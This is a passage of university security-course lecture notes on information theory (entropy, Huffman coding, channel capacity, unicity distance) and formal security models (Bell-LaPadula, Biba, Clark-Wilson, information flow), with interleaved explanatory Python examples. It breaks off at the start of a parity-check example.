Hartley showed that the information content is proportional to the logarithm of the number of possible messages. Integers between 1 and n need log2 n bits.
Shannon developed a mathematical treatment of communication and information in an important paper at
http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html
CS3235 - Hugh Anderson’s notes. Page number: 194
Information theory model
[Diagram: Information source → Transmitter → Channel → Receiver → Destination (or sink), with a Noise source feeding into the channel.]
The relevance of Shannon to secrecy is in another important paper at
http://www.cs.ucla.edu/˜jkong/research/security/shannon.html
CS3235 - Hugh Anderson’s notes. Page number: 195
Entropy
In our communication model, the units of transmission are called messages, constructed from an alphabet of (say) n symbols x ∈ {x_1, . . . , x_n}, each with a probability of transmission P_x.
We associate with each symbol x a quantity H_x which is a measure of the information associated with that symbol.
H_x = P_x log2 (1/P_x)
CS3235 - Hugh Anderson’s notes. Page number: 196
Entropy
H_x = P_x log2 (1/P_x)
If the probability of occurrence of each symbol is the same, we can derive Hartley's result, that the average amount of information transmitted in a single symbol (the source entropy) is
H(X) = log2 n
where X is a label referring to each of the source symbols x_1, . . . , x_n.
CS3235 - Hugh Anderson’s notes. Page number: 197
Entropy units
Our units for entropy can be bits/second or bits/symbol, and we also sometimes use unit-less relative entropy measures (relative to the entropy of the system if all symbols were equally likely).
CS3235 - Hugh Anderson’s notes. Page number: 198
Entropy - same probability
Symbols   Entropy of each symbol                 Bits needed
2         H_x = (1/2) log2 2 = 1/2               2 ∗ 1/2 = 1
4         H_x = (1/4) log2 4 = 1/2               4 ∗ 1/2 = 2
8         H_x = (1/8) log2 8 = 3/8               8 ∗ 3/8 = 3
16        H_x = (1/16) log2 16 = 4/16            16 ∗ 4/16 = 4
21        H_x = (1/21) log2 21 = 4.39/21         21 ∗ 4.39/21 = 4.39
CS3235 - Hugh Anderson’s notes. Page number: 199
Entropy - different probability
However, if the probability of occurrence of each symbol is not the same, we derive the following result, that the source entropy is
H(X) = Σ_{i=1}^{n} P_{x_i} log2 (1/P_{x_i})
Shannon’s paper shows that H determines the channel ca-pacity required to transmit the desired information with themost efficient coding scheme.
CS3235 - Hugh Anderson’s notes. Page number: 200
Entropy - different probability
If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is
H(X) = Σ_{i=1}^{n} P_{x_i} log2 (1/P_{x_i})
     = log2 1 + 0 ∗ log2 0
     = 0 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 201
Entropy - different probability
If we were transmitting a sequence of letters A, B, C, D, E and F with probabilities 1/2, 1/4, 1/16, 1/16, 1/16 and 1/16, the entropy for the system is
H(X) = (1/2) log2 2 + (1/4) log2 4 + (4/16) log2 16
     = 0.5 + 0.5 + 1.0
     = 2 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 202
Encoding the letters
A fixed size 3-bit code, and then a more complex code:
Symbol 3-bit code Complex code
A 000 0
B 001 10
C 010 1100
D 011 1101
E 100 1110
F 101 1111
CS3235 - Hugh Anderson’s notes. Page number: 203
Analysis of encoding
The average length of the binary digits needed to encode a typical sequence of symbols using the 3-bit code is
L(X) = Σ_{i=1}^{n} P_{x_i} · sizeof(x_i)
     = (1/2) ∗ 3 + (1/4) ∗ 3 + (4/16) ∗ 3
     = 1.5 + 0.75 + 0.75
     = 3 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 204
Analysis of encoding
The average length of the binary digits needed to encode a typical sequence of symbols using the complex encoding is
L(X) = Σ_{i=1}^{n} P_{x_i} · sizeof(x_i)
     = (1/2) ∗ 1 + (1/4) ∗ 2 + (4/16) ∗ 4
     = 0.5 + 0.5 + 1.0
     = 2 bits/symbol
i.e. it is more efficient, averaging only 2 bits for each symbol transmitted.
CS3235 - Hugh Anderson’s notes. Page number: 205
Entropy and transmission rate
If our source was transmitting 0 and 1 bits with equal probability, but the received data was corrupted 50% of the time, we might reason that our rate r(X) of information transmission was 0.5, because half of our data is getting through correctly.
[Diagram: Information source → Transmitter → Channel → Receiver → Destination (or sink), with a Noise source feeding into the channel.]
CS3235 - Hugh Anderson’s notes. Page number: 206
Entropy and transmission rate
However, a better argument is to consider the difference between the entropy of the source and the conditional entropy of the received data:
r(X) = H(X) − H(X | y)
where H(X | y) is the conditional entropy of the received data.
CS3235 - Hugh Anderson’s notes. Page number: 207
Entropy and transmission rate
H(X | y) = 0.5 ∗ log2 2 + 0.5 ∗ log2 2
         = 1
and H(X) = 1 (shown before)
so r(X) = H(X) − H(X | y)
        = 0 bits/symbol
This is a much better measure of the amount of information transmitted.
CS3235 - Hugh Anderson’s notes. Page number: 208
Redundancy
The ratio of the entropy of a source H(X) to what it would be if the symbols had equal probabilities H′(X), is called the relative entropy. We use the notation H_r(X), and
H_r(X) = H(X) / H′(X)
The redundancy of the source is 1 − H_r(X):
R(X) = 1 − H_r(X)
CS3235 - Hugh Anderson’s notes. Page number: 209
Redundancy
If we look at English text a symbol at a time [1], the redundancy is about 0.7.
This indicates that it should be simple to compress English text by about 70%.
This sort of redundancy is a unitless relative redundancy.
[1] That is, without considering letter sequences.
CS3235 - Hugh Anderson’s notes. Page number: 210
Unicity distance
Defined by Shannon - an approximation to the amount of ciphertext such that the sum of the source entropy and the encryption key entropy is the same as the number of ciphertext bits used.
Ciphertexts longer than this have only one meaningful decryption.
Ciphertexts shorter than this may have more than one meaningful decryption (and hence be stronger, as a hacker will not know which one is correct).
CS3235 - Hugh Anderson’s notes. Page number: 211
Unicity distance
The longer the unicity distance, the better the cryptosystem.
Unicity distance U is the entropy of the key divided by the redundancy of the source, and is approximately
U ≈ log2 K / (R log2 P)
(K is the key size, R is the redundancy, P is the number of symbols).
CS3235 - Hugh Anderson’s notes. Page number: 212
Unicity distance
26 letter alphabet, and 26! keys
U ≈ log2 26! / (0.7 log2 26)
  ≈ 88 / (0.7 ∗ 4.7)
  ≈ 27
So given a ciphertext of 27 symbols, a unique decoding is possible.
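The entropy, average code length, channel rate, redundancy and unicity distance calculations from the preceding slides, carried out numerically as one added example (not code from the lecture notes). The A–F source and its two codes are the slide's; the English redundancy of 0.7 and the 26!-key substitution cipher are the slide's figures too. The prefix-free check is added because it is the property that makes the variable-length "complex code" decodable at all.

```python
# Added example (not from the lecture notes): entropy, code length, channel
# rate, redundancy and unicity distance for the sources used on the slides.
from math import factorial, log2

SOURCE = {"A": 1 / 2, "B": 1 / 4, "C": 1 / 16, "D": 1 / 16, "E": 1 / 16, "F": 1 / 16}
FIXED_CODE = {"A": "000", "B": "001", "C": "010", "D": "011", "E": "100", "F": "101"}
COMPLEX_CODE = {"A": "0", "B": "10", "C": "1100", "D": "1101", "E": "1110", "F": "1111"}


def entropy(probs: dict) -> float:
    """H(X) = sum P log2(1/P); a P = 0 term contributes 0 (the limit on the slide)."""
    return sum(p * log2(1 / p) for p in probs.values() if p > 0)


def average_length(probs: dict, code: dict) -> float:
    """L(X) = sum P(x) * sizeof(x), in bits/symbol."""
    return sum(p * len(code[s]) for s, p in probs.items())


def is_prefix_free(code: dict) -> bool:
    """No codeword is a prefix of another, so a bit stream decodes unambiguously."""
    words = sorted(code.values())
    return all(not nxt.startswith(w) for w, nxt in zip(words, words[1:]))


def conditional_entropy_bsc(crossover: float) -> float:
    """H(X | y) for equiprobable bits when each bit is flipped with this probability."""
    return entropy({"same": 1 - crossover, "flipped": crossover})


def channel_rate(source_probs: dict, crossover: float) -> float:
    """r(X) = H(X) - H(X | y): the slide's measure of information actually transmitted."""
    return entropy(source_probs) - conditional_entropy_bsc(crossover)


def relative_entropy(probs: dict) -> float:
    """H_r(X) = H(X) / H'(X), where H'(X) = log2 n is the equiprobable entropy."""
    return entropy(probs) / log2(len(probs))


def redundancy(probs: dict) -> float:
    """R(X) = 1 - H_r(X)."""
    return 1 - relative_entropy(probs)


def unicity_distance(key_count: int, source_redundancy: float, symbols: int) -> float:
    """U ≈ log2 K / (R log2 P)."""
    return log2(key_count) / (source_redundancy * log2(symbols))


if __name__ == "__main__":
    print(entropy(SOURCE), average_length(SOURCE, FIXED_CODE), average_length(SOURCE, COMPLEX_CODE))
    print(channel_rate({"0": 0.5, "1": 0.5}, 0.5))               # 0.0: nothing gets through
    print(round(unicity_distance(factorial(26), 0.7, 26)))       # 27, as on the slide
```

For the A–F source the complex code reaches the entropy exactly (2 bits/symbol), which is the best any code can do; the unicity distance for the substitution cipher comes out at the slide's 27 characters with R = 0.7.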
CS3235 - Hugh Anderson’s notes. Page number: 213
Unicity distance
In general
Longer key length, then longer unicity distance.
Redundancy inversely proportional to unicity distance.
Estimates the minimum amount of ciphertext for which there is only a single plaintext solution on doing a brute force attack...
CS3235 - Hugh Anderson’s notes. Page number: 214
Chapter 5
Lecture 5 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 215
Last session
• Physical preliminaries
• Entropy
CS3235 - Hugh Anderson’s notes. Page number: 216
This session
• Channel properties
• Entropy
• Models
CS3235 - Hugh Anderson’s notes. Page number: 217
Hugh’s bigger mistakes...
CS3235 - Hugh Anderson’s notes. Page number: 218
Incorrect
[Plot: amplitudes 1.0, 0.333 and 0.2 at frequencies f, 3f and 5f.]
The plot is frequency vs time. (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 219
Correct
[Plot: amplitudes 1.0, 0.333 and 0.2 at frequencies f, 3f and 5f.]
The plot is amplitude vs frequency. (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 220
Incorrect
If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is
H(X) = Σ_{i=1}^{n} P_{x_i} log2 (1/P_{x_i})
     = log2 1 + 0 ∗ log2 0
     = 0 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 221
Correct
If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is
H(X) = Σ_{i=1}^{n} P_{x_i} log2 (1/P_{x_i})
     = 1 ∗ log2 1 + 0 ∗ log2 (1/0)
     = 0 bits/symbol
Note that lim_{y→0} y log2 (1/y) = 0
CS3235 - Hugh Anderson’s notes. Page number: 222
Page 46 of notes
The first two equations that begin H(X) should begin with L(X).
L(X) = Σ_{i=1}^{n} P_{x_i} · sizeof(x_i)
     = (1/2) ∗ 3 + (1/4) ∗ 3 + (4/16) ∗ 3
     = 1.5 + 0.75 + 0.75
     = 3 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 223
1/2 of data through correctly...
Received data is corrupted 50% of the time:
[Figure: the bit stream before and after transmission.]
CS3235 - Hugh Anderson’s notes. Page number: 224
Convolution
Applet to do convolution: http://www.cs.brown.edu/exploratories/freeSoftware/repository/edu/brown/cs/exploratories/applets/convolution/convolution java browser.html
CS3235 - Hugh Anderson’s notes. Page number: 225
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 226
Shannon and Nyquist
[Diagram: Information source → Transmitter → Channel → Receiver → Destination (or sink), with a Noise source feeding into the channel.]
Maximum BPS = W log2 (1 + S/N) bits/sec
CS3235 - Hugh Anderson’s notes. Page number: 227
Shannon and Nyquist example
If we had a telephone system with a bandwidth of 3,000 Hz, and a S/N of 30 dB (about 1024:1)
D = 3000 ∗ log2 1025
  ≈ 3000 ∗ 10
  ≈ 30000 bps
This is a typical maximum bit rate achievable over the telephone network.
CS3235 - Hugh Anderson’s notes. Page number: 228
Nyquist
The maximum data rate over a limited bandwidth (W) channel with V discrete levels is:
Maximum data rate = 2W log2 V bits/sec
For example, two-level data cannot be transmitted over the telephone network faster than 6,000 BPS, because the bandwidth of the telephone channel is only about 3,000 Hz.
CS3235 - Hugh Anderson’s notes. Page number: 229
Nyquist example
If we had a telephone system with a bandwidth of 3,000 Hz, and using 256 levels
D = 2 ∗ 3000 ∗ log2 256
  = 6000 ∗ 8
  = 48000 bps
In these equations, the assumption is that the relative entropies of the signal and noise are a maximum (that they are random).
CS3235 - Hugh Anderson’s notes. Page number: 230
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 231
Maximum entropy
In practical systems, signals rarely have maximum entropy, and we can do better - there may be methods to compress the data [2].
[2] Note: we must also differentiate between lossy and lossless compression schemes. A signal with an entropy of 0.5 may not be compressed more than 2:1 unless you use a lossy compression scheme. JPEG and Wavelet compression schemes can achieve huge data size reductions without visible impairment of images, but the restored images are not the same as the original ones - they just look the same. The lossless compression schemes used in PkZip, gzip or GIF files (LZW) cannot achieve compression ratios as high as that found in JPEG.
CS3235 - Hugh Anderson’s notes. Page number: 232
Huffman encoding
An immediate question of interest is "What is the minimum length bit string that may be used to compress a string of symbols?".
The Huffman encoding minimizes the bit length given the frequency of occurrence of each symbol [3]. The resultant bit string in the best case will be the length predicted from the calculation of the source entropy.
[3] Note that it presupposes knowledge about these frequencies.
CS3235 - Hugh Anderson’s notes. Page number: 233
Huffman encoding
How can we get knowledge about the frequency of (say)the letters in the English language?
(answer) - we read snapple bottle tops...
CS3235 - Hugh Anderson’s notes. Page number: 234
Huffman encoding
[Figure: a Huffman tree with branches labelled 0 and 1; the leaves E and T sit nearest the root, the leaves A, O, N and S one level deeper.]
Less common characters use longer bit strings.
CS3235 - Hugh Anderson’s notes. Page number: 235
Huffman encoding
Our algorithm for encoding is simple - we calculate the tree encoding knowing the frequency of each letter:
Symbol Coding
E 00
T 10
A 010
O 011
N 110
S 111
To decode, traverse the tree taking a left or right path according to the bit. The leaf has our symbol.
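Building the Huffman tree from symbol frequencies, reading the codewords off it, and decoding by walking the tree bit by bit, as an added example (not code from the lecture notes). The test uses the A–F probabilities from the entropy slides, for which Huffman produces codeword lengths 1, 2, 4, 4, 4, 4 and an average of exactly 2 bits/symbol, the source entropy. Any letter frequencies passed to huffman_code are the caller's input; none are the lecturer's data.

```python
# Added example (not from the lecture notes): Huffman coding built from symbol
# frequencies, with encode/decode and the comparison against source entropy.
import heapq
from itertools import count
from math import log2


def huffman_code(freqs: dict) -> dict:
    """Repeatedly merge the two least frequent subtrees; leaves are symbols, inner nodes pairs."""
    tie = count()                      # tie-breaker so heapq never compares subtree payloads
    heap = [(f, next(tie), sym) for sym, f in freqs.items()]
    heapq.heapify(heap)
    while len(heap) > 1:
        f1, _, left = heapq.heappop(heap)
        f2, _, right = heapq.heappop(heap)
        heapq.heappush(heap, (f1 + f2, next(tie), (left, right)))
    _, _, root = heap[0]

    codes = {}

    def walk(node, prefix: str) -> None:
        if isinstance(node, tuple):        # inner node: 0 to the left, 1 to the right
            walk(node[0], prefix + "0")
            walk(node[1], prefix + "1")
        else:
            codes[node] = prefix or "0"    # a one-symbol alphabet still needs one bit

    walk(root, "")
    return codes


def encode(text: str, codes: dict) -> str:
    return "".join(codes[c] for c in text)


def decode(bits: str, codes: dict) -> str:
    """Walk the tree: extend the prefix one bit at a time until it names a leaf."""
    leaves = {word: sym for sym, word in codes.items()}
    out, prefix = [], ""
    for b in bits:
        prefix += b
        if prefix in leaves:
            out.append(leaves[prefix])
            prefix = ""
    if prefix:
        raise ValueError("trailing bits do not complete a codeword")
    return "".join(out)


def average_length(freqs: dict, codes: dict) -> float:
    total = sum(freqs.values())
    return sum(f / total * len(codes[s]) for s, f in freqs.items())


def entropy(freqs: dict) -> float:
    total = sum(freqs.values())
    return sum(f / total * log2(total / f) for f in freqs.values() if f)


if __name__ == "__main__":
    # Constructed frequencies (not the lecturer's data): the A-F source from the slides.
    freqs = {"A": 8, "B": 4, "C": 1, "D": 1, "E": 1, "F": 1}
    codes = huffman_code(freqs)
    print(codes, average_length(freqs, codes), entropy(freqs))
```

The average length equals the entropy here only because every probability is a power of two; for other distributions Huffman stays within one bit of the entropy but does not reach it.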
CS3235 - Hugh Anderson’s notes. Page number: 236
Case study - MNP5 and V.42bis
MNP5 and V42.bis are compression schemes commonly used on modems.
MNP5 suffers from the unfortunate property that it will expand data with maximum or near-maximum entropy (instead of compressing it).
V42.bis does not have this property - it uses a large dictionary, and will not try to compress an already compressed stream.
CS3235 - Hugh Anderson’s notes. Page number: 237
MNP5
MNP5 uses two different compression methods, switching between them as appropriate. The methods are:
• Adaptive frequency encoding
• Run-length encoding
Run length encoding sends the bytes with a byte count value, and doubles the size of a data stream with maximum entropy.
CS3235 - Hugh Anderson’s notes. Page number: 238
Adaptive frequency encoding
3-bit header Body size Total code size Number of codewords
000 1 bit 4 bits 2
001 1 bit 4 bits 2
010 2 bits 5 bits 4
011 3 bits 6 bits 8
100 4 bits 7 bits 16
101 5 bits 8 bits 32
110 6 bits 9 bits 64
111 7 bits 10 bits 128
3/4 of our codewords (the 192 with 9- or 10-bit codes, out of 256) are larger than they would be if we did not use this encoding scheme.
CS3235 - Hugh Anderson’s notes. Page number: 239
Further study
• Textbook Chapter 32
• Shannon's paper on secrecy systems at http://www.cs.ucla.edu/˜jkong/research/security/shannon.html.
CS3235 - Hugh Anderson’s notes. Page number: 240
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 241
Preliminaries - security models
Definition: a range of formal policies for specifying the security of a system in terms of a (mathematical) model.
access control matrix
Bell-LaPadula
Biba
Clark-Wilson
CS3235 - Hugh Anderson’s notes. Page number: 242
Security model
Have a model
Determine properties
Verify implementations
CS3235 - Hugh Anderson’s notes. Page number: 243
Access control matrix
Rows of the matrix are subjects, columns are objects:
Subjects \ Objects    f1        f2        f3        f4
s1                    read      execute   execute
s2                    write     read      execute
s3                    read      write     execute
s4                              read      write     read
s4 cannot read f1. But subjects may collude...
CS3235 - Hugh Anderson’s notes. Page number: 244
Bell-LaPadula, confidentiality
Military style, to assure confidentiality services.
Security levels in a (total) ordering formalizing a policy which restricts information flow from a higher security level to a lower security level.
Prevents lower-level subjects from accessing higher-level objects.
Section 5.2 in textbook
CS3235 - Hugh Anderson’s notes. Page number: 245
Bell-LaPadula, levels
1. Top secret (T )
2. Secret (S)
3. Confidential (C)
4. Unclassified (U )
where T > S > C > U. Access operations are visualized using an access control matrix, and are drawn from read, write.
CS3235 - Hugh Anderson’s notes. Page number: 246
BLP security property
The clearance classification for a subject s ∈ S or object o ∈ O is denoted L(s) = l_s or L(o) = l_o. We might then assume we can use this to construct a first simple security property:
• No read-up-1: s can read o if and only if l_o ≤ l_s, and s has read access in the access control matrix.
This single property is insufficient to ensure the restriction we need for the security policy.
CS3235 - Hugh Anderson’s notes. Page number: 247
BLP Trojan Horse property
Consider the case when a low security subject creates a high security object (say a program) which then reads a high security file, copying it to a low security one. This behaviour is commonly called a Trojan Horse. A second property is needed:
• No write-down-1: s can write o if and only if l_s ≤ l_o, and s has write access in the access control matrix.
These two properties can be used to enforce our security policy, but with a severe restriction. For example, how does any subject write down without invalidating a security policy?
BLP extended
A security category c ∈ C is used to classify objects in the model, with any object belonging to a set of categories. Each pair (l × c) is termed a security level, and forms a lattice.
Lattice - chapter 30 in textbook
BLP extended
We define a relation between security levels:
• The security level (l, c) dominates (l′, c′) (written (l, c) dom (l′, c′)) iff l′ ≤ l and c′ ⊆ c.
A subject s and object o then each belong to one of these security levels.
BLP extended
The new properties are:
• No read-up-2: s can read o if and only if s dom o, and s has read access in the access control matrix.
• No write-down-2: s can write o if and only if o dom s, and s has write access in the access control matrix.
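The dominance relation and the two extended properties, as an added Python example (this is not code from the slides or the textbook). The classification ordering T > S > C > U and the category sets are the slides' model; the subjects, objects and access control matrix entries are constructed for illustration.

```python
from dataclasses import dataclass

# Classification ordering from the slide: Unclassified < Confidential < Secret < Top secret
ORDER = {"U": 0, "C": 1, "S": 2, "T": 3}


@dataclass(frozen=True)
class Level:
    """A security level (l, c): a classification plus a set of categories."""
    classification: str
    categories: frozenset

    def dom(self, other):
        # (l, c) dom (l', c') iff l' <= l and c' is a subset of c
        return (ORDER[other.classification] <= ORDER[self.classification]
                and other.categories <= self.categories)


def level(classification, *categories):
    return Level(classification, frozenset(categories))


def may_read(subject_level, object_level, rights):
    """No read-up-2: s dom o, and 'read' present in the access control matrix."""
    return subject_level.dom(object_level) and "read" in rights


def may_write(subject_level, object_level, rights):
    """No write-down-2: o dom s, and 'write' present in the access control matrix."""
    return object_level.dom(subject_level) and "write" in rights


# Constructed example system: levels of subjects and objects, and an access
# control matrix keyed by (subject, object).
SUBJECTS = {"analyst": level("S", "NUC"), "clerk": level("C")}
OBJECTS = {
    "report": level("S", "NUC"),
    "memo": level("C"),
    "plan": level("S", "NUC", "EUR"),
}
ACM = {
    ("analyst", "report"): {"read", "write"},
    ("analyst", "memo"): {"read", "write"},
    ("analyst", "plan"): {"read"},
    ("clerk", "memo"): {"read", "write"},
    ("clerk", "report"): {"read", "write"},
}


def permitted(subject, obj, operation):
    """Apply the matrix entry plus the level check for a read or a write."""
    rights = ACM.get((subject, obj), set())
    check = may_read if operation == "read" else may_write
    return check(SUBJECTS[subject], OBJECTS[obj], rights)
```

The Trojan Horse case from the earlier slide is the `("analyst", "memo")` write: the matrix grants it, but the level check refuses the write-down, so a program running as the analyst cannot copy the Secret report into the Confidential memo.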
BLP security
A system is considered secure in the current state if all the current accesses are permitted by the two properties.
A transition from one state to the next is considered secure if it goes from one secure state to another secure state.
The basic security theorem (Theorem 5-2 in the textbook) states that if the initial state of a system is secure, and if all state transitions are secure, then the system will always be secure.
BLP example
From textbook, p128:
DG UNIX uses access controls and BLP-like behaviour
BLP limits
BLP is a static model, not providing techniques for changing access rights or security levels [4], and there is an exploration and discussion of the limitations of this sort of security modelling in section 5.4 of the textbook.
However, the model does demonstrate initial ideas into how to model, and how to build, security systems that are provably secure.
[4] You might want to explore the Harrison-Ruzzo-Ullman model for this capability.
Biba model, integrity
Trustworthiness of data and programs - assurance for integrity services.
Levels like clean or dirty (in reference to database entries).
The Biba model (chapter 6.2) is a kind of dual of Bell-LaPadula: integrity versus confidentiality.
Biba levels
The integrity levels I are ordered as for the security levels.
Function i : O → I (i : S → I) returns the integrity level of an object (subject).
Biba properties
The properties/rules for the main (static) Biba model are:
• No read-down : s can read o iff i(s) ≤ i(o).
• No write-up : s can write o iff i(o) ≤ i(s).
• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).
Biba - dynamic
Biba models can also handle dynamic integrity levels, where the level of a subject reduces if it accesses an object at a lower level (in other words it has got dirty). The low-watermark policies are:
• No write-up : s can write o iff i(o) ≤ i(s).
• Subject lowers : if s reads o then i′(s) = min(i(s), i(o)).
• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).
Biba - ring
Finally, we have a ring policy,
• All read : s can read o regardless.
• No write-up : s can write o if and only if i(o) ≤ i(s).
• No invoke-up : s1 can execute s2 if and only if i(s2) ≤ i(s1).
Each of these policies has an application in some area. Example in textbook, p155 (LOCUS OS).
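The three Biba policies side by side (strict, low-watermark, ring), as an added Python example rather than code from the slides: the rules are the ones listed above, while the subject and object names and their integrity levels are constructed.

```python
class BibaSystem:
    """Integrity levels are integers; larger means more trustworthy ('cleaner').
    policy is one of 'strict', 'low-watermark' or 'ring', the slides' three."""

    def __init__(self, policy, subjects, objects):
        if policy not in ("strict", "low-watermark", "ring"):
            raise ValueError(policy)
        self.policy = policy
        self.i = dict(subjects)      # i : S -> I
        self.i.update(objects)       # i : O -> I (names assumed distinct)

    def read(self, s, o):
        if self.policy == "strict":
            return self.i[s] <= self.i[o]             # no read-down
        if self.policy == "low-watermark":
            self.i[s] = min(self.i[s], self.i[o])     # subject lowers: i'(s) = min(i(s), i(o))
            return True
        return True                                    # ring: all read

    def write(self, s, o):
        return self.i[o] <= self.i[s]                  # no write-up, in all three policies

    def invoke(self, s1, s2):
        return self.i[s2] <= self.i[s1]                # no invoke-up, in all three policies


def dirty_then_write(policy):
    """An 'editor' at level 2 reads a level-1 'scratch' file and then tries to
    write the level-2 'archive'. Returns (read allowed, editor's level after
    the read, archive write allowed) so the three policies can be compared."""
    system = BibaSystem(policy,
                        subjects={"editor": 2, "helper": 1},
                        objects={"scratch": 1, "archive": 2})
    read_ok = system.read("editor", "scratch")
    write_ok = system.write("editor", "archive")
    return read_ok, system.i["editor"], write_ok
```

Under the strict policy the dirty read is refused outright; under low-watermark it is allowed but the editor is pulled down to level 1 and can no longer write the archive; under the ring policy the read is allowed and the subject's level is untouched, so the archive write still succeeds.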
Clark-Wilson, integrity
Transactions defined through certification rules.
The Clark-Wilson model has the following terminology:
Term Definition
CDI Constrained Data Item (data subject to control)
UDI Unconstrained Data Item (data not subject to control)
IVP Integrity Verification Procedures (for testing correct CDIs)
TP Transformation Procedures (for transforming the system)
Chapter 6
Lecture 6 - Errors
Assignment 1
Form your groups,
Select your project,
Email me with your proposal for approval
Assignment 1
Literature review - not a survey :(
Formal paper - format in either word.zip or latex2e.zip in http://www.comp.nus.edu.sg/˜cs3235/2003-semesterI/
Heading, Author(s), abstract (?), Introduction, body of paper, Summary/Conclusion, References
10-50 pages, 5-50 references
Assignment 2
More detailed, in-depth study
Not necessarily a software development project
Comparison, research, idea, program
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to the lecture before...
Last session
• Channel properties
• Entropy
• Models
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
Information flow (Chapter 16)
We may also more abstractly model some security policies by considering the flow of information in a system.
We can use entropy to formalize this.
In this context, we can establish quantitative results about information flow in a system, rather than just making absolute assertions [5].
[5] For example, “System X reveals no more than 25% of the input values”.
Information flow
In the textbook we have a definition of information flow based on the conditional entropy H(x | y) of some x given y:
Definition 16-1. The command sequence c causes a flow of information from x to y′ if H(x | y′) < H(x | y). If y does not exist in s then H(x | y) = H(x).
We can use this to detect implicit flows of information, not just explicit ones in which we directly mod­ify an object.
Information flow
Consider the example on page 409 of the textbook:
if x = 1 then y := 0
else y := 1;
After this code segment, we can determine if x = 1 from y′ even though we do not ever assign y′ directly from some function of x. In other words we have an implicit flow of information from x to y′.
Information flow
Formal treatment by considering the entropy of x. If the likelihood of x = 1 is 0.5, then H(x) = 1. We can also deduce that H(x | y′) = 0, and so
H(x | y′) < H(x | y) = H(x) = 1
and information is flowing from x to y′. The paper gives some background.
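Definition 16-1 carried out numerically, as an added Python example (not code from the slides or the textbook). It computes H(x) and H(x | y′) from the joint distribution that a program induces, for the slide's `if x = 1 then y := 0 else y := 1` program, for a program with no flow, and for a constructed program that leaks only one bit of a two-bit x, which is the kind of quantitative statement footnote [5] refers to.

```python
import math
from collections import defaultdict


def entropy(dist):
    """H(x) in bits for a distribution {value: probability}."""
    return -sum(p * math.log2(p) for p in dist.values() if p > 0)


def conditional_entropy(joint):
    """H(x | y) from a joint distribution {(x, y): probability}."""
    p_y = defaultdict(float)
    for (_, y), p in joint.items():
        p_y[y] += p
    return -sum(p * math.log2(p / p_y[y]) for (_, y), p in joint.items() if p > 0)


def flow_analysis(p_x, program):
    """Run `program` (a function of x) over every input value, form the joint
    distribution of (x, y'), and apply Definition 16-1: information flows from
    x to y' when H(x | y') < H(x). Returns (H(x), H(x | y'), flow?)."""
    joint = defaultdict(float)
    for x, p in p_x.items():
        joint[(x, program(x))] += p
    h_x = entropy(p_x)
    h_x_given_y = conditional_entropy(joint)
    return h_x, h_x_given_y, h_x_given_y < h_x


# The slide's program: if x = 1 then y := 0 else y := 1
def branch_on_x(x):
    return 0 if x == 1 else 1


# A program with no flow: y' does not depend on x at all
def constant(x):
    return 0


# Constructed partial leak: y' := x mod 2 reveals the low bit of x only
def low_bit(x):
    return x % 2


UNIFORM_BIT = {0: 0.5, 1: 0.5}                  # P(x = 1) = 0.5 as on the slide
UNIFORM_TWO_BITS = {0: 0.25, 1: 0.25, 2: 0.25, 3: 0.25}
```

For the slide's program the result is H(x) = 1, H(x | y′) = 0, so one full bit flows; for `low_bit` over a uniform two-bit x, H(x) = 2 and H(x | y′) = 1, i.e. the program reveals exactly half of the input's information.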
Confinement and covert channels
The confinement problem is one of preventing a system from leaking (possibly partial) information.
Sometimes a system can have an unexpected path of transmission of data, termed a covert channel, and through the use of this covert channel information may be leaked either by a malicious program, or by accident.
Confinement and covert channels
Consider the set of permissions on a file.
An unscrupulous program could modify these permissions cyclically to transmit a very-low data-rate message to another unscrupulous program.
Confinement and covert channels
We categorize covert channels into two:
1. Storage channels: using the presence or absence of objects
2. Timing channels: the speed of events
We can attempt to identify covert channels by building a shared resource matrix, determining which processes can read and write which resources.
Attacks on databases
A governing body may keep individual information secret, but release cumulative information.
For example: today’s average temperature of SOC staff by nationality:
Singaporean Malaysian PRC Poland German Australian New Zealand ....
36.8 36.7 36.9 37.1 36.5 38.2 38.1 ....
Attacks on databases
OK - this doesn’t release any sensitive information, but
what if another part of the database released the numbers of SOC staff by nationality...
Singaporean Malaysian PRC Poland German Australian New Zealand ....
23 12 14 3 5 4 1 ....
By inference you can deduce that the temperature of a particular individual is too high!
Simple check codes
Transmit data:
1 65 3 22 47 2
Transmit data+checksum:
1 65 3 22 47 2 140
One-way parity
A      0 1 0 0 0 0 0 1
0      0 0 1 1 0 0 0 0
D      0 1 0 0 0 1 0 0
B      0 1 0 0 0 0 1 0
B      0 1 0 0 0 0 1 0
C      0 1 0 0 0 0 1 1
Check: 0 1 1 1 0 1 1 0
Two way parity
A      0 1 0 0 0 0 0 1   0
0      0 0 1 1 0 0 0 0   0
D      0 1 0 0 0 1 0 0   0
B      0 1 0 0 0 0 1 0   0
B      0 1 0 0 0 0 1 0   0
C      0 1 0 0 0 0 1 1   1
Check: 0 1 1 1 0 1 1 0   X
Simple check codes
Parity of bits - detects all 1 bit errors, but...
Horizontal and vertical parity - better, but problems with repetitive errors
Sum of values - problems with repetitive errors
Want better level of error checking
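Two-way parity over the six characters of the slides (A, 0, D, B, B, C as 8-bit ASCII), as an added Python example rather than code from the slides. It recomputes the Check row and the parity column, locates a single flipped bit from the one bad row and one bad column, and then shows the "repetitive errors" weakness: two flips in one row are detected but cannot be placed, and four flips at the corners of a rectangle are not detected at all.

```python
# The slide's six characters as 8-bit ASCII rows (labels: A, 0, D, B, B, C)
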